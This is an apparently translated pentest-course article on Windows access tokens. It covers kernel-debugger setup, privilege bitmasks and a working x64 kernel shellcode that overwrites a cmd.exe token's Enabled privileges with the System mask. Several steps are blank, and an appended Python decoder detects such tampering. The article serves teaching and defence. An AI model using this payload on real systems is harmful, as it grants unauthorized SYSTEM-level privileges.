Windows Tokens

OTUS expert Alexander Kolesnikov shared with us a useful article that he wrote specifically for students of the course "Pentest. Practice of Penetration Testing".









We, in turn, invite everyone to take part in a free demo lesson on the topic: "Windows AD: information gathering and privilege escalation. Exploits and vulnerabilities of the last 5 years."









The previous article discussed how exploits use the token-copy technique to escalate privileges. In this article we look at another technique for modifying tokens, and also try to find out how the privileges stored in the Primary Token are set.





All examples in the article are for informational purposes only. If you want to repeat the experiments, use a virtual machine, since some of the actions can damage your working machine. All experiments are performed for research purposes only.





Test bench setup

For the experiments, two virtual machines on a NAT network are suitable. Two, because kernel debugging of the operating system cannot be done any other way: the debugger has to run on a separate machine. A NAT network, so that debug symbols can be downloaded, which makes searching for data without source code easier and faster. Debugger setup is described on the Internet, but a few lines below show how it is done for Windows 10 1909.





1. Install the debugger. For Windows there is only WinDbg Preview; install it:





2. Put the target operating system into debug mode:





Reboot the system and open the second machine, which will host the debugger:





After rebooting the system:










Token

The privileges held in the Primary Token carry Se* names, for example:





  • SeAssignPrimaryToken
  • SeAudit
  • SeBackup
  • SeChangeNotify
  • SeCreateToken
  • SeDebug
  • SeLoadDriver
  • SeLockMemory
  • SeManageVolume
  • SeRestore
  • SeSecurity
  • SeTakeOwnership





The token's “Security Descriptor” can be inspected in the debugger. For the System process (PID 4):

dx @$cursession.Processes[4].KernelObject.Token







The Token field is an EX_FAST_REF: its low bits hold a reference count and must be masked off to obtain the actual pointer:





System:















Attempting this results in a BSOD on Windows builds starting with Windows 10 1607, and the BSOD is related to the token's “Security Descriptor”:





Why the BSOD? Let's check:





1.

2. cmd.exe

3.

















The bit for SeDebugPrivilege is 0x100000. Mask values for several privileges:





  • SeDebugPrivilege - 0x100000
  • SeAuditPrivilege - 0x200000
  • SeSystemEnvironmentPrivilege - 0x400000
  • SeCreatePermanentPrivilege - 0x010000
  • SeSystemtimePrivilege - 0x001000
  • SeSecurityPrivilege - 0x000100
  • SeLockMemoryPrivilege - 0x000010





The shellcode writes the privilege mask to _SEP_TOKEN_PRIVILEGES+0x8, the Enabled field of the token's privileges.










netstat -ab








The payload:





[BITS 64]
; structure offsets below are for Windows 10 1909 x64

start:
    mov r9, [gs:0x188]          ; KPCR.Prcb.CurrentThread -> current KTHREAD
    mov r9, [r9+0x220]          ; KTHREAD.ApcState.Process -> current EPROCESS
    mov r8, [r9+0x3e8]          ; EPROCESS.InheritedFromUniqueProcessId (parent cmd.exe PID)
    mov rax, r9
loop1:
    mov rax, [rax+0x2f0]        ; EPROCESS.ActiveProcessLinks.Flink
    sub rax, 0x2f0              ; back to the start of that EPROCESS
    cmp [rax+0x2e8], r8         ; EPROCESS.UniqueProcessId == parent PID?
    jne loop1
    mov rcx, rax                ; EPROCESS of the parent cmd.exe
    add rcx, 0x360              ; EPROCESS.Token (EX_FAST_REF)
    mov rax, [rcx]
    and rax, 0xFFFFFFFFFFFFFFF0 ; strip the EX_FAST_REF reference-count bits
    mov r8, 0x1e73deff20        ; privilege mask of the System token
    mov [rax+0x48], r8          ; _TOKEN.Privileges (+0x40) -> Enabled (+0x8)
    ret
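As an added example that is not from the original article: a Python decoder for the 24-byte _SEP_TOKEN_PRIVILEGES block (Present at +0x0, Enabled at +0x8, EnabledByDefault at +0x10, the standard layout) built on the LUID-equals-bit-position rule behind the mask values listed above. The sample bytes are constructed, not a real dump, and model a cmd.exe token whose Enabled field was overwritten with the System mask 0x1e73deff20; the parser flags Enabled bits that are not Present, which is what a defender would look for.

```python
import struct

# Bit position in each 64-bit mask equals the privilege LUID (standard values).
PRIVILEGE_BITS = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege",
    4: "SeLockMemoryPrivilege", 5: "SeIncreaseQuotaPrivilege",
    6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege",
    10: "SeLoadDriverPrivilege", 11: "SeSystemProfilePrivilege",
    12: "SeSystemtimePrivilege", 13: "SeProfileSingleProcessPrivilege",
    14: "SeIncreaseBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege",
    16: "SeCreatePermanentPrivilege", 17: "SeBackupPrivilege",
    18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege",
    22: "SeSystemEnvironmentPrivilege", 23: "SeChangeNotifyPrivilege",
    24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege",
    28: "SeManageVolumePrivilege", 29: "SeImpersonatePrivilege",
    30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege", 35: "SeCreateSymbolicLinkPrivilege",
    36: "SeDelegateSessionUserImpersonatePrivilege",
}
BIT_OF = {name: bit for bit, name in PRIVILEGE_BITS.items()}

def mask_of(*names):
    """Mask for the named privileges; mask_of("SeDebugPrivilege") == 0x100000."""
    return sum(1 << BIT_OF[n] for n in names)

def decode_mask(mask):
    """Names of the privileges whose bit is set, lowest LUID first."""
    return [PRIVILEGE_BITS.get(b, f"Unknown({b})") for b in range(64) if mask >> b & 1]

def parse_sep_token_privileges(blob):
    """Parse the three little-endian QWORDs of _SEP_TOKEN_PRIVILEGES. An Enabled
    bit that is not also Present cannot come from AdjustTokenPrivileges, so it
    indicates the structure was written directly (as the payload above does)."""
    present, enabled, default = struct.unpack("<QQQ", blob[:24])
    return {
        "present": decode_mask(present),
        "enabled": decode_mask(enabled),
        "enabled_by_default": decode_mask(default),
        "enabled_not_present": decode_mask(enabled & ~present),
    }

# Constructed sample (not a real dump): a medium-integrity cmd.exe token whose
# Enabled QWORD has been overwritten with the System mask from the article.
USER_PRESENT = mask_of("SeShutdownPrivilege", "SeChangeNotifyPrivilege", "SeUndockPrivilege",
                       "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege")
TAMPERED = struct.pack("<QQQ", USER_PRESENT, 0x1e73deff20, mask_of("SeChangeNotifyPrivilege"))
```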



















